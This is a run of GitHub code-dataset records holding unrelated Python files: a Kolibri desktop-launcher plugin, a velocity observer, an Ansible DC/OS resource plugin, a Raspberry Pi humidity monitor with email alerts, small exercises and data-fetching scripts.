desktop_file_parser = configparser.ConfigParser()\n desktop_file_parser.optionxform = str\n desktop_file_parser.add_section(\"Desktop Entry\")\n desktop_file_parser.set(\"Desktop Entry\", \"Version\", \"1.0\")\n desktop_file_parser.set(\"Desktop Entry\", \"Type\", \"Application\")\n desktop_file_parser.set(\"Desktop Entry\", \"Name\", self.__channelmetadata.name)\n desktop_file_parser.set(\n \"Desktop Entry\", \"Comment\", self.__channelmetadata.tagline or \"\"\n )\n desktop_file_parser.set(\n \"Desktop Entry\",\n \"Exec\",\n \"gio open x-kolibri-dispatch://{channel_id}\".format(\n channel_id=self.channel_id\n ),\n )\n desktop_file_parser.set(\"Desktop Entry\", \"X-Endless-LaunchMaximized\", \"True\")\n desktop_file_parser.set(\n \"Desktop Entry\", \"X-Kolibri-Channel-Id\", self.channel_id\n )\n desktop_file_parser.set(\n \"Desktop Entry\", \"X-Kolibri-Channel-Version\", self.channel_version\n )\n desktop_file_parser.set(\n \"Desktop Entry\", \"Categories\", \";\".join(LAUNCHER_CATEGORIES) + \";\"\n )\n\n if icon_name:\n desktop_file_parser.set(\"Desktop Entry\", \"Icon\", icon_name)\n\n kolibri_gnome = get_kolibri_gnome_path()\n if kolibri_gnome:\n desktop_file_parser.set(\"Desktop Entry\", \"TryExec\", kolibri_gnome)\n\n ensure_dir(self.desktop_file_path)\n with open(self.desktop_file_path, \"w\") as desktop_entry_file:\n desktop_file_parser.write(desktop_entry_file, space_around_delimiters=False)\n\n def write_search_provider(self):\n search_provider_file_parser = configparser.ConfigParser()\n search_provider_file_parser.optionxform = str\n search_provider_file_parser.add_section(\"Shell Search Provider\")\n search_provider_file_parser.set(\n \"Shell Search Provider\", \"DesktopId\", self.desktop_file_name\n )\n search_provider_file_parser.set(\n \"Shell Search Provider\", \"BusName\", KOLIBRI_SEARCH_PROVIDER_BUS_NAME\n )\n search_provider_file_parser.set(\n \"Shell Search Provider\",\n \"ObjectPath\",\n CHANNEL_SEARCH_PROVIDER_OBJECT_PATH_FORMAT.format(self.channel_id),\n )\n search_provider_file_parser.set(\"Shell Search Provider\", \"Version\", \"2\")\n\n ensure_dir(self.search_provider_file_path)\n with open(self.search_provider_file_path, \"w\") as search_provider_file:\n search_provider_file_parser.write(\n search_provider_file, space_around_delimiters=False\n )\n\n def write_channel_icon(self):\n if not self.__channel_icon:\n return\n\n icon_name = self.desktop_id\n icon_file_path = self.get_icon_file_path(\n icon_name + self.__channel_icon.file_extension\n )\n\n ensure_dir(icon_file_path)\n with open(icon_file_path, \"wb\") as icon_file:\n self.__channel_icon.write(icon_file)\n\n return icon_name\n\n\nclass ChannelLauncher_FromDisk(ChannelLauncher):\n def __init__(self, context, desktop_file_path, desktop_entry_data):\n super().__init__(context)\n self.__desktop_file_path = desktop_file_path\n self.__desktop_entry_data = desktop_entry_data\n\n @classmethod\n def load_all(cls, context):\n applications_dir = os.path.join(get_content_share_dir_path(), \"applications\")\n if not os.path.isdir(applications_dir):\n return\n for file_name in os.listdir(applications_dir):\n file_path = os.path.join(applications_dir, file_name)\n desktop_file_parser = configparser.ConfigParser()\n desktop_file_parser.optionxform = str\n desktop_file_parser.read(file_path)\n if desktop_file_parser.has_section(\"Desktop Entry\"):\n desktop_entry_data = dict(\n desktop_file_parser.items(section=\"Desktop Entry\")\n )\n yield cls(context, file_path, desktop_entry_data)\n\n @property\n def channel_id(self):\n return self.__desktop_entry_data.get(\"X-Kolibri-Channel-Id\")\n\n @property\n def channel_version(self):\n return self.__desktop_entry_data.get(\"X-Kolibri-Channel-Version\")\n\n @property\n def desktop_file_path(self):\n return self.__desktop_file_path\n\n @property\n def desktop_file_name(self):\n return os.path.basename(self.desktop_file_path)\n\n def write_channel_icon(self):\n pass\n\n def delete_channel_icon(self):\n icon_name = self.__desktop_entry_data.get(\"Icon\")\n\n if not icon_name:\n return\n\n # We assume the channel's icon file is a png\n icon_file_path = self.get_icon_file_path(icon_name + \".png\")\n\n if icon_file_path and os.path.isfile(icon_file_path):\n try_remove(icon_file_path)\n\n\nclass ChannelIcon(object):\n MIMETYPES_MAP = {\"image/jpg\": \"image/jpeg\"}\n\n icon_size = (256, 256)\n icon_inner_size = (256 - 48, 256 - 48)\n\n def __init__(self, thumbnail_data_uri):\n match = DATA_URI_PATTERN.match(thumbnail_data_uri)\n if not match:\n raise ValueError(\"Invalid data URI\")\n self.__thumbnail_info = match.groupdict()\n\n @property\n def mimetype(self):\n result = self.__thumbnail_info.get(\"mimetype\")\n return self.MIMETYPES_MAP.get(result, result)\n\n @cached_property\n def thumbnail_data(self):\n return base64.b64decode(self.__thumbnail_info.get(\"data_b64\"))\n\n @cached_property\n def file_extension(self):\n return \".png\"\n\n @cached_property\n def thumbnail_image(self):\n thumbnail_io = BytesIO(self.thumbnail_data)\n return Image.open(thumbnail_io)\n\n @cached_property\n def icon_image(self):\n return self.__apply_icon_mask(self.__icon_inner_default_image)\n\n def write(self, icon_file):\n self.icon_image.save(icon_file)\n\n @cached_property\n def __icon_source_image(self):\n # The icon source image is the thumbnail, cropped to remove its own\n # padding, and cropped again to square if the icon is close to square\n # already.\n\n bbox = self.thumbnail_image.getbbox()\n image_cropped = self.thumbnail_image.crop(bbox)\n return crop_image_to_square(image_cropped, cut_area=0.04)\n\n @cached_property\n def __icon_inner_fill_image(self):\n # The \"fill\" icon variant resizes the source image to icon_inner_size.\n # The corners will be rounded, later, by __apply_icon_mask.\n\n base_image = Image.new(\"RGBA\", self.icon_inner_size, (0, 0, 0, 0))\n thumbnail_image = resize_preserving_aspect_ratio(\n self.__icon_source_image, self.icon_inner_size, resample=Image.BICUBIC\n )\n paste_center(base_image, thumbnail_image)\n return base_image\n\n @cached_property\n def __icon_inner_tile_image(self):\n # The \"tile\" icon variant resizes the source image to a smaller space\n # inside icon_inner_size. The remaining space is filled with a white\n # background.\n\n thumbnail_size = (256 - 80, 256 - 80)\n\n base_image = Image.new(\"RGBA\", self.icon_inner_size, (255, 255, 255, 255))\n thumbnail_image = resize_preserving_aspect_ratio(\n self.__icon_source_image, thumbnail_size, resample=Image.BICUBIC\n )\n paste_center(base_image, thumbnail_image)\n return base_image\n\n @cached_property\n def __icon_inner_default_image(self):\n # The default icon variant is the \"fill\" variant if it is exactly\n # square with no transparent pixels. Otherwise, it is the \"tile\"\n # variant.\n\n if image_is_square(self.__icon_inner_fill_image):\n return self.__icon_inner_fill_image\n else:\n return self.__icon_inner_tile_image\n\n def __apply_icon_mask(self, icon_image):\n # The icon mask is a rounded rectangle matching the GNOME icon set.\n\n shadow_size = (256 - 50, 256 - 50)\n plate_size = (256 - 52, 256 - 52)\n\n base_mask = Image.new(\"L\", self.icon_size, (0,))\n base_mask_draw = ImageDraw.Draw(base_mask)\n base_mask_draw.rounded_rectangle(\n center_xy(base_mask.size, shadow_size),\n 14,\n fill=(200,),\n width=1,\n )\n base_mask_draw.rounded_rectangle(\n center_xy(base_mask.size, plate_size),\n 14,\n fill=(255,),\n outline=(255,),\n width=1,\n )\n\n base_image = Image.new(\"RGBA\", self.icon_size, (0, 0, 0, 0))\n paste_center(base_image, icon_image)\n base_image.putalpha(base_mask)\n\n return base_image\n","repo_name":"endlessm/kolibri-app-desktop-xdg-plugin","sub_path":"kolibri_app_desktop_xdg_plugin/channel_launchers.py","file_name":"channel_launchers.py","file_ext":"py","file_size_in_byte":15945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21264787349","text":"import numpy as np\nimport math\n\nclass Observer:\n \"\"\"\n A simple observer that assumes targets move in straight lines at a constant speed.\n\n Take in full observation, return estimated full states and estimated velocities.\n\n Attributes: \n observation_history : emmmmm... \n vel : velocities\n window : history length, i.e. history for how long before now we would like to keep\n step : discretization time step\n r_roi : Radius of region of interest\n \"\"\"\n window = 5\n observation_history = [0]*window\n step = 0.1\n vel = 0\n states = 0\n r_roi = 1\n\n\n def __init__(self, x0, stp, windw, r=1):\n self.window = windw\n self.observation_history = [x0]*windw\n self.step = stp\n self.states = x0\n self.r_roi = r\n\n\n \n def feed(self, new_obsrv):\n # print('1',self.observation_history)\n obsrv = new_obsrv.copy()\n # print(obsrv)\n self.observation_history.pop(0) # Discard the oldest observation in the slot\n self.observation_history.append(obsrv)\n\n # Successive difference method calculating velocities\n num_grp = math.floor(self.window/2)\n sum = self.observation_history[self.window-1] - self.observation_history[self.window-1]\n for i in range(1, num_grp+1):\n sum = sum + self.observation_history[self.window-i] - self.observation_history[self.window-num_grp-i]\n self.states = new_obsrv\n self.vel = sum / num_grp / (self.step*num_grp)\n\n\n\n## Test\nif __name__ == '__main__':\n v = 1\n T = 0.01\n x = np.array([[0, 0], [1, 1], [2,2]])\n observer = Observer(x, T, 5)\n for k in range(1, 10):\n x = x + v*T\n observer.feed(x)\n print(k)\n print(observer.observation_history)\n print(observer.vel)\n","repo_name":"EdmundLuan/CLF_CBF_NMPC_python","sub_path":"observer.py","file_name":"observer.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"48"} +{"seq_id":"4373747560","text":"import csv\nimport random\n\nf = open('numbers.txt','w')\n\na = []\nfor i in range(100):\n a.append(+random.randint(100,10000))\na.sort()\nprint(a)\n\n\nfor i in a:\n line = ''\n for j in range(i):\n line += str(random.randint(-100000, 100000)) + \" \"\n f.write(line+'\\n')\n\n","repo_name":"Cofeeee/AISD_GrahamScan_","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42996832121","text":"#!/usr/bin/python3\n# Definition for a point.\nclass Point(object):\n def __init__(self, a=0, b=0):\n self.x = a\n self.y = b\nfrom collections import defaultdict\nclass Solution(object):\n def maxPoints(self, points):\n n = len(points)\n if n < 3:\n return n\n Max = 0\n for i in range(n - Max):\n samep = 1\n j = i + 1\n while j < n:\n if points[i].x == points[j].x and points[i].y == points[j].y:\n samep += 1\n continue\n lMax = 1\n k = j + 1\n while k < n:\n a = (points[i].x - points[k].x)*(points[j].y - points[k].y)\n b = (points[i].y - points[k].y)*(points[j].x - points[k].x)\n if a == b:\n lMax += 1\n k += 1\n Max = max(Max, lMax + samep)\n j += 1\n i += 1\n Max = max(Max, samep)\n return Max\n\n\npoints = []\npoints.append(Point(0,0))\npoints.append(Point(-1,-1))\npoints.append(Point(2, 2))\nsol = Solution()\nresult = sol.MaxPoints(points)\nresult = sol.MaxPoints([])\nprint(result)","repo_name":"zhuango/leetCode","sub_path":"PythonForLeetCode/maxPoints.py","file_name":"maxPoints.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"} +{"seq_id":"39253172574","text":"import numpy as np\nimport pandas as pd\nimport nltk\n#from multiprocessing import Pool\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\nimport re\nfrom itertools import chain\nfrom collections import Counter\nimport pickle\nimport scipy.io as scio\nfrom sklearn.decomposition import TruncatedSVD\nimport scipy.spatial.distance as distance\nimport scipy.cluster.hierarchy as hierarchy\nfrom scipy.stats import pearsonr\n\n\ndef cluster(id, corr, reqRank):\n\n # Initial\n dat = pd.read_csv(\"../NoineEngine/Questions_Rank.csv\", encoding='latin1')\n dat['Rank'].fillna(0, inplace=True)\n ids = range(len(dat))\n sample = dat.loc[ids, :]\n L = np.loadtxt('../NoineEngine/Linkage.txt')\n\n # Next Question\n if corr:\n rel_wt = 0.75\n else:\n rel_wt = 0.95\n\n cls = hierarchy.fcluster(L, rel_wt, criterion='inconsistent')\n df_cls = pd.DataFrame({'Pos': ids, 'Cluster': cls})\n bc = pd.concat([sample, df_cls.set_index('Pos')], axis=1)\n\n cnts = df_cls.groupby('Cluster').size().sort_values(ascending=False)\n for i in range(len(cnts)):\n print(bc.loc[bc['Cluster'] == cnts.index[i]][['ID', 'Questions', 'Rank', 'Cluster']])\n\n clusterId = 0\n\n for i in range(len(bc['Cluster'])):\n row_id = bc.iloc[i, 0]\n row_rank = bc.iloc[i, 2]\n row_clusId = bc.iloc[i, 9]\n\n if row_id == id:\n clusterId = row_clusId\n break\n\n for i in range(len(bc['Cluster'])):\n row_id = bc.iloc[i, 0]\n row_rank = bc.iloc[i, 2]\n row_clusId = bc.iloc[i, 9]\n\n if corr:\n if clusterId == row_clusId and row_rank == reqRank and row_id != id:\n return row_id\n else:\n if clusterId != row_clusId and row_rank == reqRank and row_id != id:\n return row_id\n\n for i in range(len(bc['Cluster'])):\n row_id = bc.iloc[i, 0]\n row_rank = bc.iloc[i, 2]\n\n if row_rank == reqRank:\n return row_id\n","repo_name":"abhishekanand1710/Noine-Bytes","sub_path":"NoineFlow/Correlator.py","file_name":"Correlator.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"70543110545","text":"\"\"\"\nAction plugin to manipulate permission resources on a DC/OS enterprise cluster.\n\"\"\"\n\nfrom __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\n\nfrom ansible.errors import AnsibleActionFail\nfrom ansible.plugins.action import ActionBase\n\ntry:\n import dcos.security.iam as iam\n from dcos.errors import DCOSException\nexcept ImportError:\n raise AnsibleActionFail(\"Missing package: try 'pip install dcos-python'\")\n\ntry:\n from __main__ import display\nexcept ImportError:\n from ansible.utils.display import Display\n display = Display()\n\n\nclass ActionModule(ActionBase):\n def run(self, tmp=None, task_vars=None):\n\n result = super(ActionModule, self).run(tmp, task_vars)\n result['changed'] = False\n\n args = self._task.args\n rid = args.get('rid')\n description = args.get('description', 'created by Ansible')\n wanted_state = args.get('state', 'present')\n\n if rid is None:\n raise AnsibleActionFail(\n 'rid cannot be empty for dcos_iam_resource')\n\n group = iam.get_group(rid)\n current_state = 'present' if group is not None else 'absent'\n\n if self._play_context.check_mode:\n if current_state != wanted_state:\n result['changed'] = True\n result['msg'] = 'would change resource {} to be {}'.format(\n rid, wanted_state)\n return result\n\n if current_state == wanted_state:\n display.vvv(\"User {} already {}\".format(rid, wanted_state))\n else:\n display.vvv(\"User {} not {}\".format(rid, wanted_state))\n if not self._play_context.check_mode:\n try:\n if wanted_state == 'present':\n iam.create_resource(rid, description)\n result['msg'] = 'Resource {} was created'.format(rid)\n elif wanted_state == 'absent':\n iam.delete_resource(rid)\n result['msg'] = 'Resource {} was deleted'.format(rid)\n except DCOSException as e:\n raise AnsibleActionFail(e)\n\n result['changed'] = True\n\n return result\n","repo_name":"dirkjonker/ansible-dcos","sub_path":"action_plugins/dcos_iam_resource.py","file_name":"dcos_iam_resource.py","file_ext":"py","file_size_in_byte":2225,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"17086706317","text":"import os\nimport shutil\nfrom jinja2 import FileSystemLoader, environment\nfrom nomadic.util import md2html\n\n\ndir = os.path.dirname(os.path.abspath(__file__))\nenv = environment.Environment()\nenv.loader = FileSystemLoader(os.path.join(dir, '../server/assets/templates/export'))\n\n\ndef compile_note(note, outdir, templ):\n templ = env.get_template('{}.html'.format(templ))\n\n # create output directory if necessary\n outdir = os.path.join(outdir, note.title)\n if not os.path.exists(outdir):\n os.makedirs(outdir)\n\n # copy over any images\n for img in note.images:\n img_path = os.path.join(outdir, img)\n img_dir = os.path.dirname(img_path)\n\n if not os.path.exists(img_dir):\n os.makedirs(img_dir)\n\n shutil.copy(os.path.join(note.notebook.path.abs, img), img_path)\n\n # render the presentation\n html = md2html.compile_markdown(note.content)\n content = templ.render(html=html)\n\n # save it\n with open(os.path.join(outdir, note.title) + '.html', 'w') as out:\n out.write(content)\n","repo_name":"frnsys/nomadic","sub_path":"nomadic/util/compile.py","file_name":"compile.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"48"} +{"seq_id":"24134584320","text":"def player_existence(dct, name):\n if name in dct:\n return True\n return False\n\n\ndef add_position_to_player(dct_players, total_points, name, position, skill):\n if not player_existence(dct_players, name):\n dct_players[name] = {position: skill}\n total_points[name] = skill\n else:\n if position in dct_players[name]:\n if dct_players[name][position] < skill:\n dct_players[name][position] = skill\n diff = dct_players[name][position] - skill\n total_points[name] += diff\n else:\n dct_players[name][position] = skill\n total_points[name] += skill\n return dct_players, total_points\n\n\ndef battle(dct_players, total_points, player1, player2):\n common_position = False\n if player_existence(dct_players, player1) and player_existence(dct_players, player2):\n for position in dct_players[player1]:\n if position in dct_players[player2]:\n common_position = True\n break\n if common_position:\n if total_points[player1] > total_points[player2]:\n del dct_players[player2]\n del total_points[player2]\n elif total_points[player2] > total_points[player1]:\n del dct_players[player1]\n del total_points[player1]\n return dct_players, total_points\n\n\nmoba_players = {}\ntotal_skill_points = {}\ncommand = input()\nwhile not command == \"Season end\":\n if \" -> \" in command:\n player, position, skill = command.split(\" -> \")\n skill = int(skill)\n moba_players, total_skill_points = add_position_to_player(moba_players, total_skill_points, player, position,\n skill)\n elif \" vs \" in command:\n first_player, second_player = command.split(\" vs \")\n moba_players, total_skill_points = battle(moba_players, total_skill_points, first_player, second_player)\n command = input()\n\ntotal_skill_points_sorted = dict(sorted(total_skill_points.items(), key=lambda kv: (-kv[1], kv[0])))\n\nfor name, number in total_skill_points_sorted.items():\n print(f\"{name}: {number} skill\")\n [print(f\"- {x} <::> {y}\") for x, y in sorted(moba_players[name].items(), key=lambda kv: (-kv[1], kv[0]))]\n","repo_name":"1van101/SoftUni-Software-Engineering","sub_path":"python_fundamentals/more_exercises/06_dictionaries_more_exercises/moba_challenger.py","file_name":"moba_challenger.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36036298267","text":"import requests\nfrom collections import defaultdict\n\ndef request_wb_data(indicator):\n # gdp -> NY.GDP.MKTP.CD\n url_base = 'http://api.worldbank.org/v2/countries/cn;us/indicators/' + indicator\n params = {'format': 'json', 'per_page': '500', 'date': '2000:2017'}\n try:\n data = requests.get(url_base, params=params)\n except:\n data = None\n return data\n\ndef clean_json_data(request):\n data = defaultdict(list)\n for entry in request.json()[1]:\n # check if country is already in dictionary. If so, append the new x and y values to the lists\n # if country not in dictionary, then initialize the lists that will hold the x and y values\n if not data[entry['country']['value']]:\n data[entry['country']['value']] = [[], []]\n data[entry['country']['value']][0].append(int(entry['date']))\n data[entry['country']['value']][1].append(float(entry['value']))\n return data\n","repo_name":"krisbitney/interactive_dashboard","sub_path":"scripts/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39500781548","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport sys\nimport Adafruit_DHT\nimport RPi.GPIO as GPIO\nimport time\nimport smtplib\nimport logging\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(13, GPIO.OUT)\nGPIO.output(13,True)\n\nmail_sent_temp = 0\nmail_sent_hum = 0\n\n#Sends email to my address.\ndef send_email(subject, body):\n\tsmtp_user = \"\"\n\tsmpt_pass = \"\"\n\t\n\tto_add = \"anton.gustafsson@protonmail.com\"\n\tfrom_add = smtp_user\n\t\n\theader = \"To: \" + to_add + '\\n' + \"From: \" + from_add + '\\n' + subject\n\t\n\ts = smtplib.SMTP(\"smtp.gmail.com\",587)\n\ts.ehlo()\n\ts.starttls()\n\ts.ehlo()\n\t \n\ts.login(smtp_user, smpt_pass)\n\ts.sendmail(from_add, to_add, header + '\\n' + body)\n\t \n\ts.quit()\n\t#logging_monitoring(\"Email sent to admin\")\n\n#Prints and logg messages\ndef logging_monitoring(message, temp, hum):\n\tcurrent_time = time.strftime(\"%H:%M:%S\")\n\tcurrent_date = time.strftime(\"%d/%m/%Y\")\n\tmessage = \"%s %s: %s \" % (current_date, current_time, message)\n\tlogging.basicConfig(filename='humid.log',level=logging.INFO, format='%(message)s')\n\t\n\tlogging.info('{{\"date\":\"{}\", \"time\":\"{}\",\"temp\":\"{}\", \"humidity\":\"{}\" }},'.format(current_date, current_time, temp , hum))\n\tprint (message)\n\t\n#Checks temperatures if no mail has been sent within 7 hours\ndef check_temperature(temperature, mail_sent_temp):\n\tif(mail_sent_temp == 0):\n\t\tif temperature <= 10:\n\t\t\tsend_email(\"Cold\",\"Temperature is now 10 or less degrees celcius, your flowers aren't happy\")\n\t\t\tmail_sent_temp = 6\n\t\telif(temperature>=32):\n\t\t\tsend_email(\"Hot\", \"Temperature is now 32 or more degrees celcius, your flowers aren't happy\")\n\t\t\tmail_sent_temp = 6\n\t\telif(temperature>=42):\n\t\t\tsend_email(\"Hotter than hell\", \"Temperature is now 45 or more degrees celcius, your flowers are dying!\")\n\t\t\tmail_sent_temp = 6\n\t\t\n\treturn mail_sent_temp\n\n#Checks humidity if no mail has been sent within 7 hours\ndef check_humidity(humidity, mail_sent_hum):\n\tif mail_sent_hum == 0:\n\t\tif humidity < 65:\n\t\t\tsend_email(\"Thirsty\",\"Tomatoes need water\")\n\t\t\tmail_sent_hum = 6\t\n\treturn mail_sent_hum\n\t\n#Increases timer if email has been sent\ndef check_timer(mail_sent_temp, mail_sent_hum):\n\tif(mail_sent_temp != 0):\n\t\tmail_sent_temp -= 1\n\t\t\n\tif(mail_sent_hum != 0):\n\t\tmail_sent_hum -= 1\n\t\t\n\treturn mail_sent_temp, mail_sent_hum\n\t\n#logging_monitoring(\"Starting\")\n#Monitors temperature and humidity\ntry: \n\twhile True:\n\t\thumidity, temperature = Adafruit_DHT.read_retry(11, 4)\n\t\tdata_string = 'Temp: {0:0.1f} C Humidity: {1:0.1f} %'.format(temperature, humidity)\n\t\tlogging_monitoring(data_string, temperature, humidity)\n\t\tmail_sent_temp = check_temperature(temperature, mail_sent_temp)\n\t\tmail_sent_hum = check_humidity(humidity, mail_sent_hum)\n\t\tmail_sent_temp, mail_sent_hum = check_timer(mail_sent_temp, mail_sent_hum)\n\t\ttime.sleep(3600) \n\t\t\nexcept KeyboardInterrupt: \t\n\tGPIO.output(13,False)\t\n\t#logging_monitoring(\"Service exited\")\n \nfinally: \n GPIO.cleanup() # this ensures a clean exit \n\t","repo_name":"antgustech/Raspbi-humid-monitor","sub_path":"humid.py","file_name":"humid.py","file_ext":"py","file_size_in_byte":2897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23308157222","text":"from os.path import expanduser\n\n\nTOP_PROFILE_FOLDER = expanduser('~') + '/.mozilla/firefox/'\nPROFILE_REGEX = r'\\w{8}\\.'\nUSERCHROME_FOLDER = 'chrome'\nUSERCHROME_FILE = 'userChrome.css'\n\nUCM_HEADER = '/* Start UCM section. Do not edit. */\\n'\nUCM_FOOTER = '/* End UCM section. */\\n'\nIMPORT_REGEX = '@import url\\(\"(.*?\\.css)\"\\);'\nNAMESPACE_LINE = '@namespace url(\"http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul\");\\n'\n","repo_name":"crysterbater/doots","sub_path":"home-configs/bin/userchrome'/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"28704431642","text":"import socketserver\r\nimport argparse\r\nimport pickle\r\nimport threading\r\n\r\nfrom operaciones import *\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"-p\", \"--puerto\", dest = \"puerto\")\r\nparser.add_argument(\"-h\", \"--host\")\r\nargs = parser.parse_args()\r\nHOST=args.host\r\nPUERTO=args.puerto\r\nHEADER=1024\r\n\r\nclass TCPHandler(socketserver.BaseRequestHandler):\r\n def handle(self):\r\n connected = True\r\n while connected:\r\n data = self.request.recv(HEADER)\r\n if data == \"quit\":\r\n break\r\n msj_loaded = pickle.loads(data)\r\n if msj_loaded[0] == 'resta':\r\n resultado=resta.delay(msj_loaded[1],msj_loaded[2])\r\n if msj_loaded[0] == 'suma':\r\n resultado=suma.delay(msj_loaded[1],msj_loaded[2])\r\n if msj_loaded[0] == 'mult':\r\n resultado=mult.delay(msj_loaded[1],msj_loaded[2])\r\n if msj_loaded[0] == 'pow':\r\n resultado=power.delay(msj_loaded[1],msj_loaded[2])\r\n if msj_loaded[0] == 'div':\r\n resultado=division.delay(msj_loaded[1],msj_loaded[2])\r\n \r\n else:\r\n exit()\r\n message_send = pickle.dumps(resultado.get())\r\n self.request.sendall(message_send)\r\n\r\n\r\nclass ThreadTCP(socketserver.ThreadingMixIn, socketserver.TCPServer):\r\n pass\r\n\r\nif __name__ == \"__main__\":\r\n\r\n\r\n msj_loadedServer=((HOST,PUERTO))\r\n\r\n server = ThreadTCP(msj_loadedServer,TCPHandler)\r\n\r\n with server:\r\n host, puerto = server.server_address\r\n thread = threading.Thread(target=server.serve_forever)\r\n thread.daemon = True\r\n thread.start()\r\n\r\n print(host,puerto)\r\n server.shutdown() ","repo_name":"stefanoppp/celery","sub_path":"server_celery.py","file_name":"server_celery.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33304059884","text":"import uuid\r\n\r\nfrom web3 import Web3, HTTPProvider\r\n\r\nfrom contract_mapping.contract_mapping import get_contract_address_to_contract_info, get_contract_address_to_contract\r\nfrom souffle.facts_handler import get_all_relations_data, append_query_line_from_dic, load_relation\r\nfrom souffle.parser import get_souffle_query_relations_metadata\r\nfrom utils import read_full_file, get_contract_full_function_parameter_id, get_hash_of_list_items, get_max_value, \\\r\n full_function_signature\r\n\r\n\r\ndef get_events_data(contract, fromBlock, toBlock):\r\n # should have just 1 event - 'path'\r\n assert len(contract.events._events) == 1\r\n\r\n events_data = []\r\n for contractEvent in contract.events:\r\n myfilter = contractEvent.createFilter(fromBlock=fromBlock, toBlock=toBlock)\r\n eventlist = myfilter.get_all_entries()\r\n\r\n\r\n\r\n for event in eventlist:\r\n # for arg_name in event[\"args\"]:\r\n # args_names_list.append(arg_name)\r\n\r\n # event_data = {\r\n # 'blockNumber': event[\"blockNumber\"],\r\n # 'transactionIndex': event[\"transactionIndex\"],\r\n # 'logIndex': event[\"logIndex\"],\r\n # 'count': event[\"args\"]['count'],\r\n # 'path_id': event[\"args\"]['path_id'],\r\n # }\r\n\r\n events_data.append(event)\r\n\r\n return events_data\r\n\r\n\r\ndef get_function_name_and_parameters(contract, transaction_input):\r\n function = contract.decode_function_input(transaction_input)\r\n function_attr = function[0]\r\n function_vals = function[1]\r\n function_name = function_attr.abi['name']\r\n f_inputs = function_attr.abi['inputs']\r\n parameters = list()\r\n for p in f_inputs:\r\n p_name = p['name']\r\n p_data = {\r\n 'name': p_name,\r\n 'type': p['type'],\r\n 'val': function_vals[p_name]\r\n }\r\n parameters.append(p_data)\r\n return function_name, parameters\r\n\r\n\r\ndef get_dynamic_sc_call_grouped_by_block_trans(dynamic_sc_call_memory):\r\n grouped_dynamic_sc_call = {}\r\n for dc in dynamic_sc_call_memory.values():\r\n block_id = int(dc['block_id'])\r\n if block_id not in grouped_dynamic_sc_call:\r\n grouped_dynamic_sc_call[block_id] = {}\r\n transaction_id = int(dc['transaction_id'])\r\n if transaction_id not in grouped_dynamic_sc_call[block_id]:\r\n grouped_dynamic_sc_call[block_id][transaction_id] = {}\r\n dynamic_contract_id = dc['dynamic_contract_id']\r\n if dynamic_contract_id not in grouped_dynamic_sc_call[block_id][transaction_id]:\r\n grouped_dynamic_sc_call[block_id][transaction_id][dynamic_contract_id] = list()\r\n grouped_dynamic_sc_call[block_id][transaction_id][dynamic_contract_id].append(dc)\r\n return grouped_dynamic_sc_call\r\n\r\n\r\ndef get_last_dynamic_sc_state_param_written(\r\n dynamic_sc_call_state_parameter_written_grouped_by_contract_state_parameter_id,\r\n batch_id,\r\n static_contract_state_parameter_id):\r\n\r\n last_written = 'NULL'\r\n batch_id_str = str(batch_id)\r\n key = (batch_id_str, static_contract_state_parameter_id)\r\n if key in dynamic_sc_call_state_parameter_written_grouped_by_contract_state_parameter_id:\r\n l = dynamic_sc_call_state_parameter_written_grouped_by_contract_state_parameter_id[key]\r\n\r\n if len(l) > 0:\r\n last_written = l[len(l) - 1]\r\n last_written = last_written['dynamic_smart_contract_call_state_parameter_written_id']\r\n return last_written\r\n\r\n\r\n# def get_logs_hash(transaction):\r\n# logs = transaction['logs']\r\n# logs = [v for v in logs]\r\n# logs.sort(key=lambda t: int(t[0]), reverse=False)\r\n# path_ids_list = list()\r\n# visited = set()\r\n# for log in logs:\r\n# log_pos = log[0]\r\n# log_args = log[1]\r\n#\r\n# path_id = log_args['path_id']\r\n# if path_id in visited:\r\n# continue\r\n#\r\n# visited.add(path_id)\r\n# path_ids_list.append(path_id)\r\n# hash_ = get_hash_of_list_items(path_ids_list)\r\n# return hash_\r\n\r\n\r\n# def update_first_read_last_written_states_original(current_read_parameters, current_written_parameters, first_read_states,\r\n# last_write_states):\r\n# intersec = current_read_parameters.intersection(current_written_parameters)\r\n# if len(intersec) > 1:\r\n# raise Exception('we support only one state that is both written and read in the same node at most once')\r\n# elif len(intersec) == 1:\r\n# # for example state1 = state1 + var\r\n# for sv in intersec:\r\n# if sv in first_read_states:\r\n# # do nothing, state is read again\r\n# pass\r\n#\r\n# elif sv in last_write_states:\r\n# # state was read after it was written with another value, do nothing\r\n# pass\r\n#\r\n# else:\r\n# # new state read, record it\r\n# first_read_states.add(sv)\r\n# for sv in 